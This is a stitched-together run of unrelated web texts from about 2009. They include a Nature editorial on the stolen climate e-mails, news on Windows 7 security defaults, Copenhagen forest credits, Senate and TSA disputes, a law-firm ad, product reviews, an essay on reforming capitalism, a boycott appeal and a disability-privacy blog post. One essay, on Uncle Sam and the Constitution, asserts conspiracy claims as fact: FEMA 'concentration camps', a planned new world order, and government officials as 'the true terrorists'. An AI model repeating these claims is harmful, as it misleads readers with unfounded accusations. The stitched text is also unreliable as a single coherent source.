Whatever the e-mail authors may have said to one another in ( supposed ) privacy , however , what matters is how they acted .
And the fact is that , in the end , neither they nor the IPCC suppressed anything : when the assessment report was published in 2007 it referenced and discussed both papers .
If there are benefits to the e-mail theft , one is to highlight yet again the harassment that denialists inflict on some climate - change researchers , often in the form of endless , time - consuming demands for information under the US and UK Freedom of Information Acts .
Governments and institutions need to provide tangible assistance for researchers facing such a burden .
The theft highlights the harassment that denialists inflict on some climate - change researchers .
The e-mail theft also highlights how difficult it can be for climate researchers to follow the canons of scientific openness , which require them to make public the data on which they base their conclusions .
This is best done via open online archives , such as the ones maintained by the IPCC ( http://www.ipcc-data.org) and the US National Climatic Data Center ( http://www.ncdc.noaa.gov/oa/ncdc.html).
Tricky business
But for much crucial information the reality is very different .
Researchers are barred from publicly releasing meteorological data from many countries owing to contractual restrictions .
Moreover , in countries such as Germany , France and the United Kingdom , the national meteorological services will provide data sets only when researchers specifically request them , and only after a significant delay .
The lack of standard formats can also make it hard to compare and integrate data from different sources .
Every aspect of this situation needs to change : if the current episode does not spur meteorological services to improve researchers ’ ease of access , governments should force them to do so .
The stolen e-mails have prompted queries about whether Nature will investigate some of the researchers ’ own papers .
One e-mail talked of displaying the data using a ‘ trick ’ — slang for a clever ( and legitimate ) technique , but a word that denialists have used to accuse the researchers of fabricating their results .
It is Nature ‘s policy to investigate such matters if there are substantive reasons for concern , but nothing we have seen so far in the e-mails qualifies .
The UEA responded too slowly to the eruption of coverage in the media , but deserves credit for now being publicly supportive of the integrity of its scientists while also holding an independent investigation of its researchers ’ compliance with Britain ’s freedom of information requirements ( see http://go.nature.com/zRBXRP).
In the end , what the UEA e-mails really show is that scientists are human beings — and that unrelenting opposition to their work can goad them to the limits of tolerance , and tempt them to act in ways that undermine scientific values .
Yet it is precisely in such circumstances that researchers should strive to act and communicate professionally , and make their data and methods available to others , lest they provide their worst critics with ammunition .
After all , the pressures the UEA e-mailers experienced may be nothing compared with what will emerge as the United States debates a climate bill next year , and denialists use every means at their disposal to undermine trust in scientists and science .
Share this : Print
Email
Twitter
Facebook
Pinterest
LinkedIn
Reddit
Like this : Like Loading ...
Windows 7 is less secure out - of - the box than Vista , despite Redmond 's protestations to the contrary , a top security firm has claimed .
Trend Micro said that the default configurations of Windows 7 are less secure than Vista .
Raimund Genes , CTO of Trend Micro , said that Windows 7 had sacrificed security for useability - at least for default configurations .
" I 'm not saying Windows 7 is insecure , but out of the box Vista is better , " Genes told El Reg .
The User Account Control ( UAC ) feature that debuted with Vista was a security safeguard that asked users for permission before allowing applications to run .
The nagware technology irked users and was blamed for producing numerous largely meaningless pop-ups that users blithely clicked past .
Even senior Microsoft execs , for example UK security advisor Ed Gibson , have taken to describing the technology disparagingly as " User Annoyance Control " over recent months .
A toned down version of UAC has been developed for Windows 7 , but Genes regards this and other changes as a step backwards .
" I was disappointed when I first used a Windows 7 machine that there was no warning that I had no anti-virus , unlike Vista , " Genes said .
" There are no file extension hidden warnings either .
Even when you do install anti-virus , warnings that it has not been updated are almost invisible . "
" Windows 7 may be an improvement in terms of useability but in terms of security it 's a mistake , though one that is n't that surprising .
When Microsoft 's developers choose between usability and security , they will always choose useability , " Genes argued .
Genes said the security of Windows 7 for consumers might be improved by offering virtual XP , a sandboxed version of the older OS , with Windows 7 home editions .
The virtualisation technology ( criticised by other security firms , most notable Sophos , as a security risk in its own right because it needs separate patching and security protection ) was only released in enterprise versions of the operating system .
Trend 's unfavorable default security comparison between Vista and Windows 7 was released alongside its Trend Micro 2010 Future Threat Report .
The main focus of the report places the security implication of the wider IT industry shift towards cloud computing and virtualisation under the spotlight .
While offering significant benefits and cost - savings , the architectural shift means cybercrooks are likely to turn their sights towards manipulating the connection to the cloud , or attacking the data center and cloud itself , instead of trying to infect desktop or server systems .
" The focus for security firms has been protecting desktops or servers , but this needs to shift to providing security for the cloud , where sensitive information such as credit card records will be held .
Using encryption to establish shielded containers for sensitive data and improving the security and back - up of cloud computing systems needs to be improved so that we can have safe cloud computing , " Genes explained . ®
European Competition Commissioner Neelie Kroes has hit back US senators who have publicly complained about Europe 's ongoing examination of the Oracle Sun merger .
Kroes told US senators to mind their own business and concentrate on sorting out their own problems - starting with US healthcare .
Several high profile US senators including John Kerry signed an open letter to the European Commission last month which accused the regulator of dragging its feet over the $ 5.6 bn deal in order to damage US business interests .
US competition authorities have already approved the deal .
Speaking yesterday outgoing Competition supremo Kroes smacked US senators for : " interfering in someone else 's decisions rather than taking the most important decision that you have control over : improving health care . " , according to AP .
She told senators to get their priorities straight and concentrate on something they actually have control over .
Kroes is shortly to lose the Competition job to become " digital agenda commissioner " . ®
COPENHAGEN  Negotiators have all but completed a sweeping deal that would compensate countries for preserving forests , and in some cases , other natural landscapes like peat soils , swamps and fields that play a crucial role in curbing climate change .
Environmental groups have long advocated such a compensation program because forests are efficient absorbers of carbon dioxide , the primary heat - trapping gas linked to global warming .
Rain forest destruction , which releases the carbon dioxide stored in trees , is estimated to account for 20 percent of greenhouse gas emissions globally .
The agreement for the program , if signed as expected , may turn out to be the most significant achievement to come out of the Copenhagen climate talks , providing a system through which countries can be paid for conserving disappearing natural assets based on their contribution to reducing emissions .
A final draft of the agreement for the compensation program , called Reducing Emissions From Deforestation and Forest Degradation , or REDD , is to be given on Wednesday to ministers of the nearly 200 countries represented here to hammer out a framework for a global climate treaty .
Negotiators and other participants said that though some details remained to be worked out , all major points of disagreement  how to address the rights of indigenous people living on forest land and what is defined as forest , for example  had been resolved through compromise .
Christmas came a day early for the chief executive officers of Fannie Mae and Freddie Mac , the U.S. government - controlled suppliers of funding for home mortgages .
The companies on Thursday disclosed new pay packages under which Fannie CEO Michael Williams and Freddie CEO Charles ( Ed ) Haldeman Jr. will earn as much as $ 6 million a year , including bonuses , well above their current terms .
The packages came with the blessing of the Treasury , which has pumped a combined total of about $ 112 billion of capital into the companies over the past year to keep them in operation , and the Federal Housing Finance Agency , or FHFA , which regulates the companies .
The FHFA said that on average , compensation for executive officers of the companies in 2009 is down 40 % from the levels before the government seized control of them in September 2008 as defaults soared on home mortgages guaranteed by the firms .
That move , under a legal process known as conservatorship , allows the regulator to control the board and management of the companies , although their common shares remain owned by private shareholders .
The Treasury has agreed to supply as much as $ 200 billion of capital apiece to the companies in return for preferred stock paying a 10 % dividend .
The Treasury also has a warrant to acquire 79.9 % of their common stock .
Because of these arrangements , the top officers of Fannie and Freddie take their cues from the government on all major decisions , current and former executives say .
The government has made foreclosure - prevention efforts the top priority for Fannie and Freddie .
The pay packages for top officers of the companies are entirely in cash , the companies said in securities filings .
Their shares have been trading on the New York Stock Exchange at less than $ 2 apiece , and it is n't clear when the companies might return to profitability or whether the common shares will have any value in the long term .
Policy makers are just starting to debate how to transform the companies in an attempt to reduce the risks that they could again produce heavy losses that need to be covered by taxpayers .
Contact Us Today
If you are thinking about bankruptcy , it probably means that you have been in debt trouble for quite some time .
In fact , you may have reached the point where you are avoiding the phone or even the mail because you are sick of creditor harassment .
You may even be at the point where you are facing a lawsuit , wage garnishment , home foreclosure or vehicle repossession .
The Price Law Firm serves clients throughout Central Florida in all aspects of consumer bankruptcy matters .
Whether you need help with Chapter 7 or Chapter 13 bankruptcy , foreclosure defense , IRS tax issues or incorrect credit reporting , our attorneys are ready to help .
We pride ourselves on the personalized service we provide to every client .
We know that you are going through a difficult time .
You can rely on us to be there with you at every step , working to obtain the debt relief you need to make a fresh start .
Contact our office today to discuss your questions with a skilled lawyer .
You can reach us by phone at 407- 834-0090 , or by using the contact form to the right .
Charlie Price is pleased to offer a free consultation to discuss the many options you have .
Leslie Zukor runs the Freethought Book Project , which sends books about atheism to prisoners across the country .
Recently , she received a letter from Michael L. , a prisoner from Peoria , Illinois .
She had sent him a book called American Infidel : Robert G. Ingersoll , about the Great Agnostic .
Michael wrote a very moving letting back to her .
You can see his writing for yourself here , but the transcription is below :
Howdy ,
Thank so much so much for the books you sent .
Please note that they all arrived in good order and without unusual delay .
As a native Peorian , I was especially delighted to find the biography of Robert Ingersoll .
In Peoria ’s Glen Oak Park , at the bottom of a steep and circuitious road , is a secluded little court just off the park ’s egress .
In the center of this quiet plaza stands the monument to Ingersoll pictured in American Infidel .
I recall many winters when the snows would close this road to motorized traffic and adventuresome sledders would try its serpentine slope .
Those of us who did n’t wipe out on the road ’s low embankment or fly off into the trees beyond would end our rides in the shadow of Ingersoll ’s likeness .
All that time , I had no idea who Robert Ingersoll was , nor , I am certain , did any of my companions .
Of course , he was not taught in school .
This can probably be attributed more to the unfortunate fact that none of our colorful local history was taught , than that an icon of American Freethought in the area was one of Peoria ’s dirty little secrets .
( Although the placement of his memorial is in a spot so discreet , that to my knowledge , it has never attracted vandals .
Shortly after I had outgrown sleds , its shadow was also an ideal location to pack a few one - hitters or make out with a companion while visiting the park . )
In the thirty or so years since skidding to a powdery halt at his feet , I have learned a little about Robert Ingersoll and even read a few of his lectures and essays .
Now , with American Infidel , I can make a deeper connection with this great man and with my own heritage as a Peorian , an American , and a human being of liberated reason .
Again , my thanks go out to you and your sponsors for these good books .
Keep up the important work .
Much joy to you and yours this holiday season .
Be Well , Michael L.
If you ’d like to contribute to the Freethought Books Project , you can do so here .
Uncle Sam was created as a symbol of the United States representing the ideals of freedom , equality , and justice .
Although this symbol has been a patriotic representation for over 150 years , Uncle Sam cannot stand as a fair symbol of our nation any longer .
With recent attacks to the Constitution and Bill of Rights , citizens ' rights have been eroded .
If this long time representative of our nation could speak to us today perhaps he would remind us that our constitution gives us unalienable rights from the creator to the individual and can not under any circumstance be surrendered or taken .
Contrary to the common misconception , the United States is a constitutional republic and not a democracy .
In a republic , the sovereignty resides with the people themselves and one may act on his own or through his representatives when he chooses to confront a problem .
The people have no obligation to the government ; instead , the government is a servant of the people .
Since September 11 , 2001 we have been witnessing the destruction of our republic .
Congress is gradually dismantling the Bill of Rights and the Constitution with the strong influence of the two most recent presidents .
The public is distracted by a left / right paradigm that is controlled by the establishment .
While the public is busy criticizing those on the other side of the paradigm , the establishment 's power grab goes unchecked and our constitutional rights are further eroded .
In this way national sovereignty and the freedom of individuals is being destroyed .
On October 26 , 2001 , American citizens ' right to privacy ended with the passage of the Patriot Act .
Of the 435 US Representatives , the Patriot Act was read by no one before it was voted on and passed , a violation of the Representatives ' oath of office .
The 342 paged bill allows for violations to citizens ' rights including the search of home and property without knowledge or consent of the citizen , known as " sneak and peek " spying .
Also permitted by the bill is the indefinite imprisonment of any citizen without due process , access to the courts , or the counsel of a lawyer .
The Federal Bureau of Investigation is now able to obtain records from businesses , hospitals , bookstores , and libraries for any reason and can search phone , email , and financial records without a court order .
Since the passing of the Patriot Act , a number of bills have been initiated and passed by Congress , which further violate citizens ' liberties .
The Military Commissions Act of October 17 , 2006 assigns dictatorial powers to the president while stripping citizens of the right to habeas corpus .
The John Warner National Defense
Act empowers military troops to police within US cities during emergency situations to suppress public disorder and dissent , a violation of the Posse Comitatus Act of 1878 .
The US has also engaged in torture , initiated undeclared wars , built FEMA camps that closely resemble concentration camps , encouraged the public to spy on each other , and committed several other acts that allow the government to have increased control over the lives of its citizens .
A number of groups and individuals constitute the establishment or ruling class elite and wield enormous influence over our country 's policy makers .
Our government servants are constantly changing laws to favor and protect global banks .
While the Constitution is being destroyed , these global bankers are committing financial terrorism .
The private banking cartel of the Federal Reserve has been all but openly permitted to bankrupt our country and destroy our wealth , setting up the need for a global currency .
The multinational corporations as well as the technocrats of large foundations and other non-governmental organizations lobby congress with a large degree of influence as well .
Seldom is it the voice of ordinary citizens the shapes the actions and opinions of our representatives in congress .
From the influence of the global powers and ruling establishment a new world order is emerging .
Once only recognized by the media as mere conspiracy , it is now considered a reality as hundreds of articles across the world address this issue on a weekly basis .
The standardization of one system of government throughout the world is steadily being introduced as we come into the Age of World Managers .
If you look at the charter and mandate of the Council on Foreign Relations and the Royal Institute of International Affairs , you will see that the future they envision is a world of service .
According to these documents , every individual 's only purpose will be to serve the world state .
We are living through a cultural revolution right now that is transitioning us into a world system .
The major media plays a significant role in forming social opinion as it relates to global and national events .
Many people 's thoughts and opinions are chiefly shaped by what they view on television .
These individuals have been trained not to look at the obvious but only at what is presented to them .
This country has fallen victim to a form of psychic tyranny , where we have become mind slaves of major media mainly through the use of television .
If you study Stalin you will see how those in power know that the masses can be strongly influenced by repetition .
The media bombards the public with repetition of certain thoughts or opinions and individuals slowly start to adopt these thoughts and opinions as their own .
Lenin once said , " We shall conquer the world by the use of slogans . "
President Obama was elected on an array of slogans one of which was taken from a children 's cartoon , " Yes We Can . "
Our culture , created mainly by the mass media , has trained the public to be docile and apathetic .
The people of the US have become conditioned to accept what is presented to them ; they are kept in a state of ignorance as to the true on goings of our government .
Rather than trust themselves , many people will only shape their opinions from those who are presented as experts or authority figures in the mass media .
In this way the US resembles the beginnings of a scientific dictatorship - a managed society ruled by the intellectual elite .
It will be through the use of slogans and scientific experts that the new world order will be ushered in ; the establishment is ensuring a smooth transition to a global system without significant opposition from the people .
Public relations pioneer Edward Bernays wrote in his 1928 book , " Propaganda " , " The conscious and intelligent manipulation of the organized habits and opinions of the masses is an important element in democratic society .
Those who manipulate this unseen mechanism of society constitute an invisible government which is the true ruling power of our country . "
Every day it grows more evident that we do not control the government ; the government is controlled by the global elite who are increasingly managing the people .
Our nation is becoming something that we have long fought against .
A repressive society has been created within this once great nation and " we the people " are unwittingly becoming serfs to our own public servants .
Their objective to rule rests in the annihilation of our consciousness as they create a state of learned helplessness among the masses .
If we do n't wake up and become conscious of where our country is heading , we may soon find ourselves in a world resembling a prison planet of total centralized control where all our freedoms are taken away for our supposed security .
It 's time for people to start being individuals and to create independent thought .
Since 2001 , government officials have repeatedly said , " Terrorists hate us for our freedom . "
Now it is clear that the true terrorists are the ruling establishment working through those who are elected to represent and serve the people .
“ It ’s the most original , interesting and fine - sounding system I ’ve come across in a long time ” Financial Times
“ Joey Roth Ceramic Speakers ooze style with the same ease with which they produce sound . ”
Uncrate
“ The clearest and most nuanced sound we ’ve ever heard on a system this size . ” full review
“ It ’s the most original , interesting and fine - sounding system I ’ve come across in a long time for a work desk or small room . ” full review
“ Joey Roth Ceramic Speakers ooze style with the same ease with which they produce sound . ” full review
“ Roth has created a set of porcelian speakers with a new matching subwoofer that beg to be used . ” full review
“ If you are in the market for a condo or office system , I urge you to hear Roth ’s kit . ” full review
“ It ’s beautiful , but I ca n’t get over how lovely this thing sounds . ” full review
“ Roth ’s ceramic speakers are the absolute best that you ’ll find in this price range . ” full review
“ Roth not only combined porcelain , wood and metal , but also minimally transformed each material to retain its individuality . ” full review ( PDF )
“ The third - generation of this 2.1 industrial design classic could easily be considered a design exercise — but it ’s so much more . ” full review
How do I connect the Subwoofer to earlier versions ( versions 1 and 2 ) of the Ceramic Speakers ?
The Subwoofer is fully compatible with all versions of the Ceramic Speakers .
The included RCA to 3.5 mm cable is used to connect the Subwoofer to the 3.5 mm input on the back of your original amplifier .
The new version 3 amplifier connects to the subwoofer using the included RCA to RCA cables .
Sen .
John McCain took a shot at Al Franken on the Senate floor this afternoon for not allowing Joe Lieberman extra time to speak about health care .
Presiding over the Senate , Franken cut off Lieberman for exceeding his 10 - minute speaking limit and then denied the Connecticut senator 's appeal for more time -- a rare occurence in the legislative body .
This exchange prompted McCain to fire back , exclaiming that he 's never " seen a member denied an extra minute or so as [ Franken ] just did . "
An Independent member of the Democratic caucus , Lieberman has tentatively voiced support for the health care reform bill after essentially forcing one of its key provisions to be nixed early this week .
When Michigan Sen. Carl Levin stepped in to say that it had also happened earlier in the day because of an effort to " get this bill going , " McCain responded that , " I just have n’t seen it before myself , and I do n’t like it . "
A spokesman for Majority Leader Harry Reid said that Franken was merely adhering to a request from Reid to strictly enforce the rules because the Senate is already in session practically " round the clock . "
This is second time this week Franken has ruffled feathers on the Senate floor .
Here is the video :
Here is the transcript :
Franken : “ The senator has spoken for 10 minutes . ”
Lieberman : “ I wonder if I could ask unanimous consent for just an additional moment . ”
Franken : “ In my capacity as a Senator from Minnesota , I object .
Lieberman : “ Really .
OK .
I do n’t take it personally .
I will ask unanimous consent that the remainder of my remarks be included in the record as if read . ”
Franken : “ Without objection .
The Senator from Arizona . ”
McCain : " Mr. President I ask unanimous consent that the Senator from Rhode Island be recognized for 10 minutes followed by the Senator from Michigan , the distinguished chairman of the Armed Services committee who will be speaking on the bill and that I be recognized to follow them . ”
Unidentified : " I assume that that ’s for 10 minutes each . ”
Franken : " Is that for 10 minutes each ?
McCain : " Yea . I do .
But I just saw – I ‘ve been around here 20 - some years , first time I ’ve ever seen a member denied an extra minute or two to finish his remarks .
And I must say that I do n’t know what ’s happening here in this body , but I think it ’s wrong .
And so it ’s fine with me that it be 10 minutes but I ’ll tell you I ’ve never seen a member denied an extra minute or so as the chair just did . "
Levin : " … I think that the same thing did occur earlier this afternoon for reasons which have to do with trying to get this bill going , but any --"
McCain : " I just have n’t seen it before myself , and I do n’t like it .
And I think it harms the comity of the senate not to allow one of our members at least a minute .
I ’m sure that time is urgent here but I doubt if it would be that urgent . "
The recession and the crisis and banking are the least of the reasons for thinking that we need reforms .
the crisis of capitalism goes much deeper : the influence big business has on governments ( and the warped policies this leads to ) , increasing central control of the economy and the general move away from free markets ..
I have some modest proposals on how to fix capitalism .
Break up monopolies and oligopolies
Under existing competition ( anti- trust in American ) laws , it is necessary to prove abuse of the monopoly .
This allows a business to avoid competition , because it has not been proved to have used particular practices .
Competition may be locked out ( for example , by network effects ) and consumers may suffer from a lack of innovation or product quality , but none of that is illegal .
The solution is to assume that monopolies are harmful and should be broken up .
Either this should be an invariable rule , or it should be up to the monopolist to prove that the monopoly is somehow beneficial .
An exception should be made for natural monopolies , but the price of that should be tight regulation , nationalisation , or ( best of all ) mutualisation .
That still leaves the problem of olgopolies .
The answer is simple : break up any company with enough market share to have a noticeable influence on prices — say more than 5 % nationally or 10 % at a city / county level .
Again , they would need to make the case of exceptions .
Doing this would also mean that there would be no “ too big to fail ” banks , so a financial crisis would be easier to solve : let them go bust and nationalise the assets and liabilities .
Remove barriers to entry
Abolish patents .
They have not been proven to speed progress : the evidence seems to be to the contrary .
They definitely increase costs , are an inefficient way of funding R & D and allow oligopolists to block competition .
Reduce the copyright term to the optimal length suggested by research of about 15 years .
It ought to be obvious that works produced in the reign of Queen Victoria should not be in copyright in the 21 st century .
century .
Exclude works distributed with DRM from copyright to ensure that copyright works do fall into the public domain when the copyright expires .
Reduce the copyright term on computer software to two years , and make copyright contingent on disclosing source code ( so others can alter the software when it comes out of copyright ) .
Abolish region of origin rules .
It should be legal to describe a Cava ( when selling it ) as having been made in the same way as Champagne .
Abolish unnecessarily restrictive licensing .
Many US states require people to be licensed to work as interior designers or hairdressers .
I can understand requiring doctors or auditors to be licensed , but these are just barriers to entry .
Reduce bureaucracy
The best example of the problem ( or opportunity from his point of view ) that I have heard , is something Ted Tuppen , the founder and CEO of the huge British pub chain Enterprise Inns , said .
I may not have got the wording exactly right , but , as I remember it , it was :
There will always be pubs available to buy because owners of free houses are driven out of the business by the amount of bureaucracy .
Small businesses cannot cope with tight regulation .
Big businesses can hire teams of lawyers and paper - pushers .
This is one of the many problems with patents .
The government , far from discouraging oligopolies , is actually encouraging their formation .
Stop being “ business friendly ”
People seem to be thinking much less clearly about this now than they did in the 18th century .
Back then , the business friendly ideology was called “ mercantilism ” , and it was this was the primary source of opposition to free markets .
Now , governments profess to be in favour of free markets and “ business friendly ” .
Of course , businesses sometimes want free markets , for example they do not want to regulated .
On the other hand they also want to minimise competition , reduce costs , receive subsidies and form cartels .
Businesses are usually in favour of free markets in general , but not in the specific case of their own industry .
The new mercantilism is the root cause of the problems most of my other proposals seek to solve .
It has also lead to a failure to regulate properly .
The obvious examples are the clear failures in the regulation of banks ( such as allowing deposit takers to have high risk investment banking operations ) , but there are others : the US broke up Standard Oil and AT & T , but failed to break up Microsoft , reflecting the general trend towards letting businesses do as they like .
New mercantilism has dropped the one aspect of the 18th century form that I find has some redeeming features : economic nationalism .
Democracy is compromised by the economic pressure tyrants can bring in a globalised economy .
I also find it extremely odd that governments will minutely examine an applicant for a holiday visa , but allow a dubious foreign tycoon to gain great influence within their country by buying influential businesses .
New mercantilism is dishonest .
It does not openly oppose free markets .
Instead it relies on conflating free markets with capitalism .
Financially penalise large businesses
This idea is simple .
Tax big companies more .
This will discourage mergers except where there are clear gains .
British tax law already has lower rates for small companies , but this does not go far enough .
The rates should keep increasing as companies get larger ( at the moment there are no further increases on companies with profits greater than £ 1.5 m : I would suggest bands at say £ 15 m , £ 150 m and £ 1.5 bn as well ) .
Obviously , we would need similar systems in all major economies .
The size criteria should not be based on profit .
It should be based on value added : so a big company that has a bad year would not see its tax rate reduce ( obviously taxes paid would do down in proportion to profit ) .
Give shareholders control
Shareholders are supposed to the owners of a company , but in the case of large listed companies this control is limited .
This does lead to problems :
Shareholders have to resort to expensive and disruptive means such as accepting hostile takeover bids to replace incompetent management — this also tends to encourage consolidation where there is no real economic benefit .
Management have an incentive to focus on the short term .
They can take their bonuses and leave , while accumulating problems for the future .
Management tend to overpay themselves .
As J.K. Galbraith said : “ The high salary of the chief executive of a large corporation is not a market reward for achievement .
It is frequently in the nature of a warm personal gesture from an individual to himself . ”
Management indulge their egos , buy engaging in exciting takeovers , and risky businesses , rather than getting on with the humdrum but reliably profitable .
It is impossible to prove what people were thinking , but it is hard not to believe that this contributed to the destruction of GEC / Marconi
Reject the corrosive “ greed is good ” ideology
Adam Smith never intended that the idea of the “ invisible hand ” should be interpreted as meaning that people should pursue their own interests , and that this would lead to an optimum outcome .
He wrote extensively on morality .
The reason for those troublesome bonus schemes for directors is that it is assumed that they would not run the company as well as they could unless they were “ incentivised ” with payments for success .
This contradicts management theory : Herzberg classifies pay as a “ hygine factor ” , a poor motivator compared to , for example , job satisfaction .
What is even worse is that by telling people that they are expected to be selfish , they become more selfish .
Economics students become more selfish because they are repeatedly taught to expect that people are rational and selfish : the association between the two can only strengthen the effect .
Society is permeated , especially in business , politics and economics , with the idea that is people pursue their own interests , this will automatically lead to the best outcome , and that , therefore , people should be selfish .
This can not be fixed by endless incentives to align interests : life and business is too complex for that to work .
A free market is not a substitute for integrity .
Break the loop
What matters most is the rejection of the new mercantilism , which will at least stop things getting worse , but we still need to undo the legislation and the structures that have been put into place at the behest of the mercantilists .
The two go together : the rise of the new mercantilism is partly the result of the lobbying power of large corporations .
Break them up and reduce their power and they lose their influence .
Education is also important .
Most people cannot , at the moment , distinguish between capitalism and free markets , or see the parallels between the original and the new mercantilism .
Edit 23 Nov 2009 : I have fixed some typos and written a follow - up that addresses some of the points that have come up in discussion .
After the attempted bombing of a Northwest Airlines flight on Christmas day , a months - old question for the Senate became a pressing concern for the public :
Why is the Transportation Security Administration without an appointed director ?
While President Obama did make a nomination to the spot — one Erroll Southers , a counterterrorism expert and former FBI special agent — Senator Jim DeMint ( R - SC ) has held up his appointment for months .
His blockade of Southers ’ nomination is apparently due to President Obama ’s promise that he would push to allow TSA baggage screeners full union rights .
ADVERTISEMENT
The objection being , if baggage screeners are allowed to negotiate for better pay , benefits and working conditions , it would somehow place national security at risk .
“ DeMint ’s objection creates a procedural hurdle that will probably take at least three days of debate and test votes to overcome , ” The Washington Post reported .
Senate Majority Leader Harry Reid ( D - NV ) has vowed to fast - track the nomination once the Senate returns to session in late January .
Supporters of allowing union rights at the TSA “ point out that other workers deemed responsible for public safety — like police and firemen — are heavily unionized , ” U.S. News and World Report noted in 2008 .
“ And many other federal employees , including those who deal with national security like border patrol agents and customs officers , have the right to collectively bargain . ”
Speaking to CNN on Tuesday , DeMint defended his objection to the nomination , repeatedly insisting “ there ’s a reason ” why the TSA is not allowed to unionize , but never really outlining what that reason is .
ADVERTISEMENT
At one point , he even appeared to blame illegal immigration on labor unions .
“ I think the American people should be aware that the priority of the administration is to submit our airport security to collective bargaining with the unions , even though that ’s been prohibited since the agency was formed , ” DeMint explained .
The reason it was prohibited , he said , is because the agency has “ a constant need to adjust and to be flexible , to use imagination and to change things . ”
ADVERTISEMENT
“ We can not ask a third party union boss whether we can move a screener from one station to another , ” DeMint added .
The American Federation of Government Employees disagrees with the senator .
ADVERTISEMENT
“ This is not an issue of security , ” a group spokeswoman said , according to CNN .
“ There is no evidence that labor union rights have any effect on transportation security officers .
This is a dedicated workforce who see their jobs as important to the security of the nation . ”
“ They point to union members who acted after 9/11 and the Fort Hood massacre as well , ” the host said .
“ These were union members — firefighters , police officers — who essentially acted very quickly , and that your argument does n’t hold water here . ”
“ The union boss that you were interviewing used the customs and border enforcement as an example , ” DeMint said , though customs and border enforcement had not been mentioned during the segment .
“ We do have 12 million undocumented aliens in our country and that agency has also had to deal with all kinds of charges for changing prices for parking .
They ’re dealing with the collective bargaining of unions all the time and they ’re not as effective as they should be . ”
ADVERTISEMENT
“ John Gage , the president of the American Federation of Government Employees , told CNN earlier this month , ‘ People who insinuate that being a union member has a nation security implication are just totally wrong , ' ” Pro Publica noted .
This video is from CNN , broadcast Dec. 29 , 2009 .
Air Traffic Controller is an online airport simulation game where you direct aircraft on the ground and through controlled airspace .
Organize and expedite the flow of air traffic at a major airport .
Your mission is to manage the airport avoiding any delays or collisions .
Watch out for the planes in the air as for the once on the ground .
You can choose between three gates .
It is best to start with gate 1 , which has only one airstrip and is easier to manage than gate 2 or 3 , which both have two runways .
Prepare the planes to take off and decide when to land the incoming ones .
Stay calm and concentrated even if you have to face a great volume of air traffic .
It is all about perfect management .
Are you ready for this responsible task ?
Find out and enjoy playing Air Traffic Controller , a free online game on Silvergames.com !
Controls : Mouse
Not sure if you know about Ahava Dead Sea Laboratories — it ’s an Israeli company that makes bath salts , sun screen , foot scrubs and other high - end products sold in pharmacies and department stores .
Ahava promises “ Beauty Secrets from the Dead Sea . ”
But wait until you hear those secrets !
Because Ahava is hiding the ugly truth — its products actually come from stolen Palestinian natural resources in the Occupied Territory of the Palestinian West Bank , and are produced in the illegal settlement of Mitzpe Shalem .
Do n’t let the “ Made in Israel ” sticker fool you — when you buy Ahava products you help finance the destruction of hope for a peaceful and just future for both Israelis and Palestinians .
Ahava puts a pretty face on its crimes , even paying Oxfam Ambassador and “ Sex in the City ” star Kristen Davis to be its spokeswoman .
But here ’s what Oxfam itself has to say about Ahava ’s deceptive packaging :
" The settlements on the West Bank are illegal under international humanitarian law and that creates a lot of problems for the Palestinians that live there .
” " Consumers that are buying produce that are grown in illegal settlements need to have that information so that they can make an informed choice .
" Do n’t the facts about Ahava make your skin crawl ?
For instant relief visit CODEPINK ’s www.stolenbeauty.org today , and sign up to help get the word out to Kristen and our communities — real beauty is more than skin deep !
The Thames frozen over
Throughout the ages the Thames has been locked in Winter 's icy grip on countless occasions .
In olden time when its bed was much wider , ice would form at the sides , and as the frost increased , would extend from bank to bank .
In 1063 it is recorded that it was frozen over for fourteen weeks , and again in 1076 .
In 1434 it was frozen over below London Bridge , as far down as Gravesend , and the frost lasted from November 24th to February 10th .
In 1515 the ice on the river was strong enough to bear carriages , and many passed over between Lambeth and Westminster , but unfortunately it is not said what sort of carriages - coaches did not come into use until a later date .
In 1564 we first hear of all sorts of diversions on the frozen river , the first real Frost Fair , but very little is recorded of it .
There can be little doubt that London Bridge , with its narrow arches and huge piers , contributed not a little to the frequent freezing of the river from bank to bank .
Since the new bridge has been built such an occurrence has been less frequent .
The floating ice was massed against these piers and heaped up on the starlings , and so formed a barrier , and the intervals between soon got frozen over .
Insurance companies are very fond of finding ways to avoid paying out any money on behalf of their customers .
In fact , they employ people who are actually specialists at that sort of thing , and these people will go to great lengths to prevent their employers from having to pony up .
Many people are aware that private insurance companies as well as government agencies which provide social services conduct investigations on people enrolled in their plans , looking for evidence to deny benefits , and that these organizations will go to great lengths to find information to support their investigations .
This is something which many people with disabilities must be aware of , or risk having disability insurance , health insurance , and social services denied on the grounds of the results of such investigations .
The Internet , in particular , has proved to be quite the goldmine for insurance industry snooping , as Nathalie Blanchard learned recently .
This Canadian woman lost her health insurance benefits because the insurance company found photographs of her looking happy .
On Facebook .
And decided that these images were evidence that she was not actually depressed , and therefore was not entitled to benefits .
This cautionary tale is one among many ; insurance companies are clearly Internet savvy and becoming more so all the time , and it ’s an important thing to bear in mind when deciding how much personal information to disclose on the Internet .
Historically , the primary concern has been about personal safety , but for people with disabilities , we also need to think about the safety of our benefits , because a single blog post , comment , or photograph could become evidence which is used to deny an insurance claim or to refuse to provide coverage .
True privacy is a short commodity on the Internet .
Even private , password - protected spaces can be penetrated , and pseudonyms can be broken .
For people like me , who make our own names common knowledge , the relatively thin veil of privacy does n’t even exist .
I often fall into the trap of thinking of the Internet as a safe place , forgetting that other people are actually on the Internet , and that not all of them are my friends , and I know that many others do the same .
Social attitudes about disability mean that if someone with a disability dares to say “ I had a great day today , ” or “ I ’m in minimal pain tonight , ” or “ I ’m having fun and enjoying my life , ” it ’s read to suggest that this person is no longer disabled .
No longer needs benefits and assistance .
This is really frustrating , because we like to talk about our good days and accomplishments and the things that make us happy .
A huge part of disability activism is about pointing out that disability is not a tragedy , and that it ’s possible to have fun !
While disabled !
To enjoy life , even !
Yet , we run up against the problem that our very advocacy can be used as evidence to hurt people by organizations which have a vested interest in cutting down on benefits payments .
Participating in a march , writing on a disability activism website , being outspoken , leaving a simple comment somewhere on the Internet , sticking your neck out , these are all things which put us in danger because they can be used to gather evidence against us .
Even as we advocate , we run the risks of compromising ourselves and others .
Even as we work to change social attitudes , those attitudes are weaponized to deny benefits and claims .
To drop us from insurance policies .
To inform us that no , we are not entitled to social services .
Insurance companies seize upon these social attitudes , and comb through the Internet to find evidence that their customers might have the audacity to have fun while being disabled .
That photograph of you skiing with a grin on your face must mean that you do n’t really have [ condition ] .
The fact that you update a sporadic blog means that you ca n’t possibly have [ condition ] .
